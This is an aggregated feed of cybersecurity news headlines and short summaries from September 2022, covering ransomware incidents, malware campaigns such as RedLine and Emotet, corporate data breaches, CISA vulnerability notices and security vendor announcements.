                2022-09-20 https://www.bleepingcomputer.com/news/security/hive-ransomware-claims-attack-on-new-york-racing-association/
                The Hive ransomware operation claimed responsibility for an attack on the New York Racing Association (NYRA), which previously disclosed that a cyber attack on June 30, 2022, impacted IT operations and website availability and compromised member data. [...] "

                Autosummary: "


                2K game support hacked to email RedLine info-stealing malware

                exploits
                2022-09-20 https://www.bleepingcomputer.com/news/security/2k-game-support-hacked-to-email-redline-info-stealing-malware/
                Hackers have compromised the support system of American video game publisher 2K and now are sending support tickets to gamers containing the RedLine password-stealing malware. [...] "

                Autosummary: RedLine Stealer is an information-stealing malware that attempts to steal a wide variety of data, including browser history, browser cookies, saved browser passwords, credit cards, VPN passwords, IM content, system information, and cryptocurrency wallets. "


                Russian Sandworm APT impersonates Ukrainian telcos to deliver malware

                exploits
                2022-09-20 https://securityaffairs.co/wordpress/135996/apt/sandworm-targets-ukraine-teleco.html

                Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops […]

                The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.

                "

                Autosummary: The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management. "


                2K Games says hacked help desk targeted players with malware

                exploits
                2022-09-20 https://www.bleepingcomputer.com/news/security/2k-games-says-hacked-help-desk-targeted-players-with-malware/
                American video game publisher 2K has confirmed that its help desk platform was hacked and used to target customers with fake support tickets pushing malware via embedded links. [...] "

                Autosummary: 2K is the publisher behind numerous popular game franchises, including NBA 2K, Borderlands, WWE 2K, PGA Tour 2K, Bioshock, Civilization, and Xcom. "


                American Airlines suffers data breach after phishing incident

                financial
                2022-09-20 https://www.malwarebytes.com/blog/news/2022/09/american-airlines-suffers-data-breach-after-phishing-incident

                Categories: News

                Tags: American Airlines

                Tags: data breach

                Tags: phishing

                Tags: identity theft

                Major airline American Airlines fell victim to a data breach after a cybercriminal got access to the email accounts of several employees via a phishing attack.

                (Read more...)

                The post American Airlines suffers data breach after phishing incident appeared first on Malwarebytes Labs.

                "

                Autosummary: What the attackers had access to In the notice, American Airlines wrote: “The personal information involved in this incident may have included your name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information you provided.” Other signs that something's phishy: The email, text, or voicemail is requesting that you update/fill in personal information. "


                Belden and Cylus join forces to provide cybersecurity platform for rail operators

                ciber
                2022-09-20 https://www.helpnetsecurity.com/2022/09/21/belden-cylus/

                Belden has joined forces with Cylus, and will enable customers that use Belden’s Firewall to supplement it with an optimized version of CylusOne software available for license from Cylus. The combination of Belden and Cylus solutions that customers will be able to implement offers a cybersecurity platform for rail operators for both rolling stock and signaling systems. As the rail industry continues to adopt automated, wireless, and connected technologies – both trackside and onboard – … More

                The post Belden and Cylus join forces to provide cybersecurity platform for rail operators appeared first on Help Net Security.

                "

                Autosummary: The combined Belden and Cylus cybersecurity solution is tailored to signaling and rolling stock systems, combining Belden’s next-generation industrial firewall (NGFW), the EAGLE40-6M, with CylusOne, the cybersecurity solution providing continuous monitoring and real-time protection for rolling stock and rail infrastructure. "


                GuidePoint Security partners with Deepwatch to help government agencies protect against cyber threats

                government
                2022-09-20 https://www.helpnetsecurity.com/2022/09/21/guidepoint-security-deepwatch/

                GuidePoint Security announced that Deepwatch has joined the Emerging Cyber Vendor Program. This GuidePoint Security Program is specifically designed to help emerging cybersecurity vendors expand their federal footprint. As part of this program, the Deepwatch MDR solution is now available under GuidePoint’s GSA Multiple Award Schedule Contract #GS-35F-508CA. Through this partnership, Deepwatch’s MDR solution will be brought to the public sector through GuidePoint Security, which has 40+ years of collective federal expertise across sales and … More

                The post GuidePoint Security partners with Deepwatch to help government agencies protect against cyber threats appeared first on Help Net Security.

                "

                Autosummary: "


                Crypto giveaway scams continue to escalate

                financial ransomware
                2022-09-19 https://www.helpnetsecurity.com/2022/09/19/crypto-giveaway-scams-continue-to-escalate/

                Group-IB has noted a fivefold increase in the number of domains used for crypto giveaway scams that involve fake YouTube streams in the first half of 2022. In addition to Vitalik Buterin, Elon Musk, and other crypto celebs, scammers started exploiting the name of Nayib Bukele, the president of Salvador. The evolution of crypto giveaway scams Crypto giveaway scams have evolved into an illicit market segment with multiple services that aim to facilitate fraudulent operations. … More

                The post Crypto giveaway scams continue to escalate appeared first on Help Net Security.

                "

                Autosummary: Scammers have the following at their disposal: an exchange platform for hacked YouTube accounts, viewer boosting services, manuals, website editors, admin panel developers, domain names, bulletproof hosting, and tools and people who can create deepfake videos. After gaining access to a legitimate account, a fake crypto streamer renames the channel, deletes all the previously uploaded videos from the playlist, changes the user pic, adds new design features, and uploads relevant crypto-related content.In addition to Vitalik Buterin, Elon Musk, and other crypto celebs, scammers started exploiting the name of Nayib Bukele, the president of Salvador. "


                Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware

                exploits ransomware
                2022-09-19 https://thehackernews.com/2022/09/europol-and-bitdefender-release-free.html
                A decryptor for the LockerGoga ransomware has been made available by Romanian cybersecurity firm Bitdefender in collaboration with Europol, the No More Ransom project, and Zürich law enforcement authorities. Identified in January 2019, LockerGoga drew headlines for its attacks against the Norwegian aluminum giant Norsk Hydro. It's said to have infected more than 1,800 victims in 71 countries, "

                Autosummary: "


                VMware, Microsoft warn of widespread Chromeloader malware attacks

                exploits
                2022-09-19 https://www.bleepingcomputer.com/news/security/vmware-microsoft-warn-of-widespread-chromeloader-malware-attacks/
                The operators of the Chromeloader adware are evolving their attack methods and gradually transforming the low-risk tool into a dangerous malware loader, seen dropping ransomware in some cases. [...] "

                Autosummary: Files contained in a ChromeLoader ISO archive ChromeLoader ISOs commonly contain four files, a ZIP archive containing the malware, an ICON file, a batch file (commonly named Resources.bat) that installs the malware, and a Windows shortcut that launches the batch file. "


                Revolut hack exposes data of 50,000 users, fuels new phishing wave

                financial
                2022-09-19 https://www.bleepingcomputer.com/news/security/revolut-hack-exposes-data-of-50-000-users-fuels-new-phishing-wave/
                Revolut is sending out notices of a data breach to a small percentage of impacted users, informing them of a security incident where an unauthorized third party accessed internal data. [...] "

                Autosummary: The Lithuanian data protection agency notes that the likely exposed information includes: email addresses, full names, postal addresses, phone numbers, limited payment card data, account data. However, in a message to an affected customer, Revolut says that the type of compromised personal data varies for different customers. Founded in 2015, Revolut is a financial technology company that has seen rapid growth, now offering banking, money management, and investment services to customers all over the world. "


                Emotet Botnet Started Distributing Quantum and BlackCat Ransomware

                exploits ransomware
                2022-09-19 https://thehackernews.com/2022/09/emotet-botnet-started-distributing.html
                The Emotet malware is now being leveraged by ransomware-as-a-service (RaaS) groups, including Quantum and BlackCat, after Conti's official retirement from the threat landscape this year. Emotet started off as a banking trojan in 2014, but updates added to it over time have transformed the malware into a highly potent threat that's capable of downloading other payloads onto the victim's machine, "

                Autosummary: "


                Microsoft 365 phishing attacks impersonate U.S. govt agencies

                financial
                2022-09-19 https://www.bleepingcomputer.com/news/security/microsoft-365-phishing-attacks-impersonate-us-govt-agencies/
                An ongoing phishing campaign targeting U.S. government contractors has expanded its operation to push higher-quality lures and better-crafted documents. [...] "

                Autosummary: Also, the PDFs previously featured the same signee, “edward ambakederemo,” whereas now, the metadata in the documents matches the spoofed department. "


                Russian Sandworm hackers pose as Ukrainian telcos to drop malware

                exploits
                2022-09-19 https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-pose-as-ukrainian-telcos-to-drop-malware/
                The Russian state-sponsored hacking group known as Sandworm has been observed masquerading as telecommunication providers to target Ukrainian entities with malware. [...] "

                Autosummary: The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management. "


                American Airlines discloses data breach after employee email compromise

                financial
                2022-09-19 https://www.bleepingcomputer.com/news/security/american-airlines-discloses-data-breach-after-employee-email-compromise/
                American Airlines has notified customers of a recent data breach after attackers compromised an undisclosed number of employee email accounts and gained access to sensitive personal information. [...] "

                Autosummary: Personal information exposed in the attack and potentially accessed by the threat actors may have included employees' and customers' names, dates of birth, mailing addresses, phone numbers, email addresses, driver's license numbers, passport numbers, and/or certain medical information. "


                Phosphorus and EverSec Group collaboration expands xIoT security throughout the US

                industry
                2022-09-18 https://www.helpnetsecurity.com/2022/09/19/phosphorus-eversec-group/

                Phosphorus has joined forces with EverSec Group. The cybersecurity solutions provider and security advisor to many of the world’s largest brand names will act as a value-added reseller (VAR) for Phosphorus in the U.S. market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the U.S. to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “This exciting collaboration with a proven solution … More

                The post Phosphorus and EverSec Group collaboration expands xIoT security throughout the US appeared first on Help Net Security.

                "

                Autosummary: "


                New York ambulance service discloses data breach after ransomware attack

                financial exploits ransomware
                2022-09-17 https://www.bleepingcomputer.com/news/security/new-york-ambulance-service-discloses-data-breach-after-ransomware-attack/
                Empress EMS (Emergency Medical Services), a New York-based emergency response and ambulance service provider, has disclosed a data breach that exposed customer information. [...] "

                Autosummary: “Some of these files contained patient names, dates of service, insurance information, and in some instances, Social Security numbers,” reads the disclosure from Empress EMS. "


                CISA adds Stuxnet bug to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-09-17 https://securityaffairs.co/wordpress/135853/security/known-exploited-vulnerabilities-catalog-stuxnet-bug.html

                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including the bug used in the Stuxnet attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog. Below is the list of vulnerabilities added to the catalog: CVE-2022-40139: Trend […]

                The post CISA adds Stuxnet bug to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Emotet botnet now pushes Quantum and BlackCat ransomware

                exploits ransomware
                2022-09-17 https://www.bleepingcomputer.com/news/security/emotet-botnet-now-pushes-quantum-and-blackcat-ransomware/
                While monitoring the Emotet botnet's current activity, security researchers found that the malware is now being used by the Quantum and BlackCat ransomware gangs to deploy their payloads. [...] "

                Autosummary: The Emotet malware was first deployed in attacks as a banking trojan in 2014 and has evolved into a botnet used by the TA542 threat group (aka Mummy Spider) to steal data, perform reconnaissance, and move laterally throughout victims' networks, as well as to deliver second-stage malicious payloads. "


                Uber hacked, internal systems breached and vulnerability reports stolen

                exploits
                2022-09-16 https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/
                Uber suffered a cyberattack Thursday afternoon with a hacker gaining access to vulnerability reports and sharing screenshots of the company's internal systems, email dashboard, and Slack server. [...] "

                Autosummary: Other systems the hacker accessed include the company's Amazon Web Services console, VMware ESXi virtual machines, Google Workspace email admin dashboard, and Slack server, to which the hacker posted messages. "


                OneSpan launches Virtual Room to offer bank-grade identity and authentication security

                financial
                2022-09-16 https://www.helpnetsecurity.com/2022/09/16/onespan-virtual-room/

                OneSpan has launched its secure Virtual Room cloud service which enables organizations to deliver live, high-touch assistance to their customers in a high-assurance virtual environment. This customer engagement solution gives organizations the ability to balance identity security, authentication, and e-signature solutions from the broader OneSpan portfolio with a high-assurance virtual experience that is the next best thing to entering a branch or meeting in person. Virtual Room complements digital-first transaction experiences by providing an opportunity … More

                The post OneSpan launches Virtual Room to offer bank-grade identity and authentication security appeared first on Help Net Security.

                "

                Autosummary: Combining OneSpan’s heritage in high-assurance identity verification and authentication with agreement co-browsing, web-enabled videoconferencing, rich collaboration features, and built-in e-signature, Virtual Room helps organizations engage and transact with customers with confidence. "


                CISA orders agencies to patch vulnerability used in Stuxnet attacks

                exploits
                2022-09-16 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-vulnerability-used-in-stuxnet-attacks/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added half a dozen vulnerabilities to its catalog of Known Exploited Vulnerabilities and is ordering federal agencies to follow vendors' instructions to fix them. [...] "

                Autosummary: "


                Bitdefender releases free decryptor for LockerGoga ransomware

                exploits ransomware
                2022-09-16 https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-decryptor-for-lockergoga-ransomware/
                Romanian cybersecurity firm Bitdefender has released a free decryptor to help LockerGoga ransomware victims recover their files without paying a ransom. [...] "

                Autosummary: "Its operator, who has been detained since October 2021 pending trial, is part of a larger cybercrime ring that used LockerGoga and MegaCortex ransomware to infect more than 1,800 persons and institutions in 71 countries to cause an estimated damage of $US 104 million," Bitdefender explains in the decryptor announcement. "


                North Korean Hackers Spreading Trojanized Versions of PuTTY Client Application

                exploits
                2022-09-16 https://thehackernews.com/2022/09/north-korean-hackers-spreading.html
                A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client. Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name UNC4034. "UNC4034 established communication with the victim over WhatsApp and lured them "

                Autosummary: "


                How to Use a UTM Solution & Win Time, Money and Resources

                financial
                2022-09-16 https://thehackernews.com/2022/09/how-to-use-utm-solution-win-time-money.html
                Unified threat management is thought to be a universal solution for many reasons. First of all, it is compatible with almost any hardware. As a business or an MSP, you don’t have to bother with leasing or subleasing expensive equipment. There is no need to chase your clients to return your costly hardware. The all-in-one UTM solution will save you money and time & make work routine less "

                Autosummary: What SafeUTM did was build a VPN network for remote connection of employees to their workplaces, setting up two-factor authentication to protect against connecting untrusted users & site-to-site connection at branch offices via IPSec, and configuring a fault tolerance cluster. State university of higher education, 500 users: The university had several issues that a UTM could fix: the content filter base was only relevant to English-speaking users, and filtering settings for different user groups were not flexible or customizable. "


                The Week in Ransomware - September 16th 2022 - Iranian Sanctions

                exploits ransomware
                2022-09-16 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-16th-2022-iranian-sanctions/
                It has been a fairly quiet week on the ransomware front, with the biggest news being US sanctions on Iranians linked to ransomware attacks. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @jorntvdw, @demonslay335, @serghei, @malwareforme, @malwrhunterteam, @BleepinComputer, @LawrenceAbrams, @Seifreed, @DanielGallagher, @VK_Intel, @FourOctets, @billtoulas, @struppigel, @PolarToffee, @fwosar, @Ionut_Ilascu, @Bitdefender, @AlvieriD, @AWNetworks, @LabsSentinel, @pcrisk, @CISAgov, @security_score, @censysio, and @juanbrodersen. Researchers also released some interesting reports this week. In ransomware attack-related news, the Yanluowang ransomware gang began leaking data stolen during a cyberattack on Cisco and the Hive ransomware claimed an attack on Bell Technical Solutions (BTS).


                Critical zero-days make September's Patch Tuesday a "Patch Now" release

                exploits
                2022-09-16 https://www.computerworld.com/article/3673944/critical-zero-days-make-septembers-patch-tuesday-a-patch-now-release.html#tk.rss_security

                With 63 updates affecting Windows, Microsoft Office and the Visual Studio and .NET platforms — and reports of three publicly exploited vulnerabilities (CVE-2022-37969, CVE-2022-34713, CVE-2021-40444) — this month's Patch Tuesday release gets a "Patch Now" priority. Key testing areas include printing, Microsoft Word, and in general application un-installations. (The Microsoft Office, .NET and browser updates can be added to your standard release schedules.)


                Autosummary: Mitigations and workarounds. There are four mitigations and workarounds included in this Patch Tuesday release. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms (ASP.NET Core, .NET ...). Key testing scenarios: Given the large number of changes included in the September patch cycle, I have broken down the testing scenarios into high-risk and standard-risk groups. High Risk: These changes are likely to include functionality changes, may deprecate existing functionality, and will likely require the creation of new testing plans. Test these newly-released functionality updates. This is another broad update that covers the following key Windows features: Windows Networking (DNS, TLS and the TCP/IP stack); Cryptography (IKE extensions and Kerberos); Printing (again); Microsoft OLE; Remote Desktop (Connection Manager and APIs).


                Bitdefender releases Universal LockerGoga ransomware decryptor

                exploits ransomware
                2022-09-16 https://securityaffairs.co/wordpress/135843/malware/lockergoga-ransomware-decryptor.html

                Bitdefender has released a free decryptor to allow the victims of the LockerGoga ransomware to recover their files without paying a ransom. The cybersecurity firm Bitdefender has released a free decryptor to allow LockerGoga ransomware victims to recover their encrypted files without paying a ransom. “We’re pleased to announce the availability of a new decryptor […]

                The post Bitdefender releases Universal LockerGoga ransomware decryptor appeared first on Security Affairs.



                SMBs are hardest-hit by ransomware

                exploits ransomware
                2022-09-15 https://www.helpnetsecurity.com/2022/09/15/small-businesses-ransomware-targets/

                Coalition announced the mid-year update to its 2022 Cyber Claims Report detailing the evolution of cyber trends, revealing that small businesses have become bigger targets, overall incidents are down, and ransomware attacks are declining as demands go unpaid. During the first half of 2022, the average cost of a claim for a small business owner increased to $139,000, which is 58% higher than levels during the first half of 2021. “Across industries, we continue to … More

                The post SMBs are hardest-hit by ransomware appeared first on Help Net Security.


                Autosummary: Other key findings: Phishing triggers the majority of cyber incidents, accounting for 57.9% of reported claims; cyber gangs have built a thriving business; funds transfer fraud (FTF) claims have held steady thanks to phishing, and Microsoft Exchange has become the vulnerability that persists.


                U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks

                exploits ransomware
                2022-09-15 https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html
                The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020. The agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked

                Autosummary: Fortinet FortiOS SSL VPN 2FA bypass vulnerability (CVE-2020-12812), ProxyShell (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and Log4Shell (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105).


                Crooks are using lures related to Her Majesty Queen Elizabeth II in phishing attacks

                financial
                2022-09-15 https://securityaffairs.co/wordpress/135764/cyber-crime/queen-elizabeth-ii-phishing.html

                Threat actors are exploiting the death of Queen Elizabeth II as bait in phishing attacks to steal Microsoft account credentials from victims. Researchers from Proofpoint are warning of threat actors that are using the death of Queen Elizabeth II as bait in phishing attacks. The attackers aim at tricking recipients into visiting sites designed to […]

                The post Crooks are using lures related to Her Majesty Queen Elizabeth II in phishing attacks appeared first on Security Affairs.


                Autosummary: The first mention of EvilProxy was detected in early May 2022; this is when the actors running it released a demonstration video detailing how it could be used to deliver advanced phishing links with the intention to compromise consumer accounts belonging to major brands such as Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex and others.


                Webworm hackers modify old malware in new attacks to evade attribution

                exploits
                2022-09-15 https://www.bleepingcomputer.com/news/security/webworm-hackers-modify-old-malware-in-new-attacks-to-evade-attribution/
                Chinese cyberespionage hackers of the "Webworm" group are undergoing experimentation, using modified decade-old RATs (remote access trojans) in the wild. [...]

                Autosummary: One of the new features of Deed RAT, which is essentially a modified version of Gh0st RAT, is a versatile C2 communication system supporting multiple protocols, including TCP, TLS, HTTP, HTTPS, UDP, and DNS.


                US government software suppliers must attest their solutions are secure

                government
                2022-09-15 https://www.helpnetsecurity.com/2022/09/15/us-government-software-secure/

                The Office of Management and Budget (OMB) has issued a memo requiring US federal government agencies to use software that has been built according to secure software development practices and whose developers follow practices for software supply chain security, as specified by the National Institute of Standards and Technology (NIST). “The term ‘software’ for purposes of this memorandum includes firmware, operating systems, applications, and application services (e.g., cloud-based software), as well as products containing software,” … More

                The post US government software suppliers must attest their solutions are secure appeared first on Help Net Security.



                Russian hackers use new info stealer malware against Ukrainian orgs

                exploits
                2022-09-15 https://www.bleepingcomputer.com/news/security/russian-hackers-use-new-info-stealer-malware-against-ukrainian-orgs/
                Russian hackers have been targeting Ukrainian entities with previously unseen info-stealing malware during a new espionage campaign that is still active. [...]

                Autosummary: “We suspect it may be a component of Gamaredon’s ‘Giddome’ backdoor family, but we are unable to confirm that at this time” - Cisco Talos. The new piece of malware has clear instructions to steal files with the following extensions: .DOC, .DOCX, .XLS, .RTF, .ODT, .TXT, .JPG, .JPEG, .PDF, .PS1, .RAR, .ZIP, .7Z and .MDB.


                Researchers Warn of Self-Spreading Malware Targeting Gamers via YouTube

                exploits
                2022-09-15 https://thehackernews.com/2022/09/researchers-warn-of-self-spreading.html
                Gamers looking for cheats on YouTube are being targeted with links to malicious password-protected archive files designed to install the RedLine Stealer malware and crypto miners on compromised machines. "The videos advertise cheats and cracks and provide instructions on hacking popular games and software," Kaspersky security researcher Oleg Kupreev said in a new report published today.



                Russian Gamaredon Hackers Target Ukrainian Government Using Info-Stealing Malware

                exploits government
                2022-09-15 https://thehackernews.com/2022/09/russian-gamaredon-hackers-target.html
                An ongoing espionage campaign operated by the Russia-linked Gamaredon group is targeting employees of Ukrainian government, defense, and law enforcement agencies with a piece of custom-made information stealing malware. "The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine," Cisco Talos researchers Asheer Malhotra and Guilherme Venere said in a



                Experts warn of self-spreading malware targeting gamers looking for cheats on YouTube

                exploits
                2022-09-15 https://securityaffairs.co/wordpress/135788/malware/self-spreading-malware-target-gamers.html

                Threat actors target gamers looking for cheats on YouTube with the RedLine Stealer information-stealing malware and crypto miners Researchers from Kaspersky have spotted a self-extracting archive, served to gamers looking for cheats on YouTube, that was employed to deliver the RedLine Stealer information-stealing malware and crypto miners. The RedLine malware allows operators to steal several […]

                The post Experts warn of self-spreading malware targeting gamers looking for cheats on YouTube appeared first on Security Affairs.


                Autosummary: “The original bundle is a self-extracting RAR archive containing a number of malicious files, clean utilities and a script to automatically run the unpacked contents.” Some of the games for which the threat actors published videos are APB Reloaded, CrossFire, DayZ, Farming Simulator, Farthest Frontier, FIFA 22, Final Fantasy XIV, Forza, Lego Star Wars, Sniper Elite, and Spider-Man, among others.


                Hackers trojanize PuTTY SSH client to backdoor media company

                exploits
                2022-09-15 https://www.bleepingcomputer.com/news/security/hackers-trojanize-putty-ssh-client-to-backdoor-media-company/
                North Korean hackers are using trojanized versions of the PuTTY SSH client to deploy backdoors on targets' devices as part of a fake Amazon job assessment. [...]

                Autosummary: The commands supported by AIRDRY.V2 are the following nine: upload basic system information; update the beacon interval based on a value provided by the C2 server; deactivate until new start date and time; upload the current configuration; update the configuration; keep-alive; update the beacon interval based on a value in the configuration; update the AES key used to encrypt C2 requests and configuration data; download and execute a plugin in memory. Compared to the previous version of AIRDRY, the new variant supports fewer commands, but the plugin execution in memory and updating the AES key for C2 communications are new capabilities.


                Hive ransomware claims cyberattack on Bell Canada subsidiary

                exploits ransomware ciber
                2022-09-15 https://www.bleepingcomputer.com/news/security/hive-ransomware-claims-cyberattack-on-bell-canada-subsidiary/
                The Hive ransomware gang claimed responsibility for an attack that hit the systems of Bell Canada subsidiary Bell Technical Solutions (BTS). [...]

                Autosummary: Hive is a Ransomware-as-a-Service (RaaS) operation active since June 2021 behind attacks against dozens of organizations, counting only those victims who had their data leaked online after refusing to pay the ransom. The Federal Bureau of Investigation (FBI) released some indicators of compromise and technical details associated with Hive ransomware attacks in August 2021.


                Microsoft Edge’s News Feed ads abused for tech support scams

                financial
                2022-09-15 https://www.bleepingcomputer.com/news/security/microsoft-edge-s-news-feed-ads-abused-for-tech-support-scams/
                An ongoing malvertising campaign is injecting ads in the Microsoft Edge News Feed to redirect potential victims to websites pushing tech support scams. [...]



                New malware bundle self-spreads through YouTube gaming videos

                exploits
                2022-09-15 https://www.bleepingcomputer.com/news/security/new-malware-bundle-self-spreads-through-youtube-gaming-videos/
                A new malware bundle uses victims' YouTube channels to upload malicious video tutorials advertising fake cheats and cracks for popular video games to spread the malicious package further. [...]

                Autosummary: Specifically, the RAR contains batch files that run three malicious executables, namely “MakiseKurisu.exe”, “download.exe”, and “upload.exe”, which perform the bundle’s self-propagation.


                Kinara and Arcturus Networks partner to provide AI solutions for smart city apps

                government
                2022-09-15 https://www.helpnetsecurity.com/2022/09/16/kinara-arcturus-networks/

                Kinara and Arcturus Networks partnership combines the Kinara Ara-1 Edge AI processor with Arcturus Brinq edge AI and vision analytics software to drive detection, tracking and characterization solutions. The partnership delivers the critical software and hardware platforms required by OEMs to build real-time edge applications for public safety, transportation, healthcare, retail, and industrial markets. For example, Kinara and Arcturus can deliver a real-time solution for road condition monitoring, allowing public transportation buses retrofitted with smart … More

                The post Kinara and Arcturus Networks partner to provide AI solutions for smart city apps appeared first on Help Net Security.


                Autosummary: “Arcturus uses its Atlas platform with NXP’s i.MX 8M Plus applications processor to provide excellent in-device inference performance for standard classification and detection algorithms, and we can cost-effectively add our Ara-1 edge AI accelerator to the Atlas platform to deliver the ability to scale up to an additional 20x higher inference performance for more complex models and applications demanding higher resolution and higher accuracy video processing,” said Markus Levy, VP Business Development of Kinara.


                Salesforce expands its use of Workday to support continued global growth

                ransomware
                2022-09-14 https://www.helpnetsecurity.com/2022/09/14/workday-salesforce/

                Salesforce has expanded its use of Workday to support continued global growth. The organization has selected Workday Financial Management, Workday Accounting Center, Workday Adaptive Planning, and Workday Prism Analytics, building on its existing use of Workday Human Capital Management (HCM), Workday Recruiting, Workday Time Tracking, and Workday Payroll for U.S. and Canada. Technology from Salesforce, which saw revenue growth of 25% in its fiscal year 2022, helps companies digitally transform to grow their relationships with … More

                The post Salesforce expands its use of Workday to support continued global growth appeared first on Help Net Security.


                Autosummary: The organization has selected Workday Financial Management, Workday Accounting Center, Workday Adaptive Planning, and Workday Prism Analytics, building on its existing use of Workday Human Capital Management (HCM), Workday Recruiting, Workday Time Tracking, and Workday Payroll for U.S. and Canada.


                Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform

                industry
                2022-09-14 https://www.helpnetsecurity.com/2022/09/14/daon-identityx/

                Daon has announced the availability of IdentityX voice biometrics on the Genesys AppFoundry. Leveraging the Genesys AudioHook API, the new integration delivers identity verification and proofing, mitigates fraudulent account-take-over (ATO) and increases the speed of customers moving through their desired workflows. This connectivity to Daon IdentityX is easy for Genesys customers to implement, and runs seamlessly in the background. This solution addresses a growing need among businesses: In 2021, incidents of fraud cost Americans $25 … More

                The post Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform appeared first on Help Net Security.



                CFOs’ overconfidence in cybersecurity can cost millions

                ciber
                2022-09-14 https://www.helpnetsecurity.com/2022/09/14/cfos-cybersecurity-confidence/

                Kroll announced its report Cyber Risk and CFOs: Over-Confidence is Costly which found chief financial officers (CFOs) to be woefully in the dark regarding cybersecurity, despite confidence in their company’s ability to respond to an incident. The report, conducted by StudioID of Industry Dive, exposed three key themes among the 180 senior finance executives surveyed worldwide: Ignorance is bliss. Eighty-seven percent of CFOs are either very or extremely confident in their organization’s cyberattack response. This … More

                The post CFOs’ overconfidence in cybersecurity can cost millions appeared first on Help Net Security.


                Autosummary: David Ball, Managing Director in the Valuation Advisory Services practice at Kroll, said: “Cyber incidents have the potential to cause material damage or impairment to the assets of a company, particularly intangible assets, including intellectual property, customer relationships and brand.”


                novoShield launches iPhone phishing protection app on the App Store

                financial
                2022-09-14 https://www.helpnetsecurity.com/2022/09/14/novoshield-iphone-phishing-protection/

                novoShield emerged from stealth, launching its iPhone phishing protection app on the App Store. The company’s cybersecurity solution for mobile devices provides everyone – from individual users to businesses of any size – with the technology they need to combat the surging mobile phishing threat without compromising the privacy of the user. novoShield is on a mission to provide easy-to-use and effective enterprise-grade security for all. As more and more consumers and businesses moved online … More

                The post novoShield launches iPhone phishing protection app on the App Store appeared first on Help Net Security.


                Autosummary: Designed to defend against a new era of digital threats, novoShield’s best-in-class solution detects malicious websites in real-time and blocks users from accessing them, while also providing users with live on-screen indications that reassure them when they’re browsing safe websites.


                Keysight unveils automotive test solution for mobile industry processor interface

                industry
                2022-09-14 https://www.helpnetsecurity.com/2022/09/14/keysight-automotive-test-solution/

                Keysight Technologies has released a new automotive serializer/deserializer (SerDes) receiver (Rx) compliance test solution to verify mobile industry processor interface (MIPI) A-PHY devices based on the Compliance Test Specification (CTS) requirements. This solution was developed in collaboration with BitifEye Digital Test Solutions and Wilder Technologies, with the support of Valens Semiconductor. Silicon vendors are planning to implement MIPI A-PHY, a long-reach physical layer interface for automotive and other surround-sensor applications, including cameras and in-vehicle infotainment … More

                The post Keysight unveils automotive test solution for mobile industry processor interface appeared first on Help Net Security.


                Autosummary: “Our customers will benefit from testing solutions that enable device makers of new automotive in-vehicle networks, either standardized or accepted, to become global standards for automotive high-speed data transmission,” Henaut continued.


                Asigra Tigris Data Protection now incorporates CDR for protection against deeply embedded malware

                exploits
                2022-09-14 https://www.helpnetsecurity.com/2022/09/14/asigra-tigris-data-protection/

                Asigra has released Tigris Data Protection software with CDR (Content Disarm & Reconstruction). According to the 2022 Verizon Business Data Breach Investigation’s Report, “This has been an unprecedented year in cybersecurity history, shedding light on some of the leading issues affecting the international security landscape. Of particular concern is the alarming rise in ransomware breaches, which increased by 13 percent in a single year – representing a jump greater than the past five years combined.” … More

                The post Asigra Tigris Data Protection now incorporates CDR for protection against deeply embedded malware appeared first on Help Net Security.


                Autosummary: Asigra’s security architecture now includes bidirectional antimalware scanning with inline detection on both the backup and recovery streams, zero-day exploit protection, Deep MFA (multi-factor authentication), variable repository naming to non-standard names to prevent recognition and encryption/deletion, soft-delete enablement, FIPS 140-2 certified encryption, and now bidirectional CDR.


                Over 280,000 WordPress Sites Attacked Using WPGateway Plugin Zero-Day Vulnerability

                exploits
                2022-09-14 https://thehackernews.com/2022/09/over-280000-wordpress-sites-attacked.html
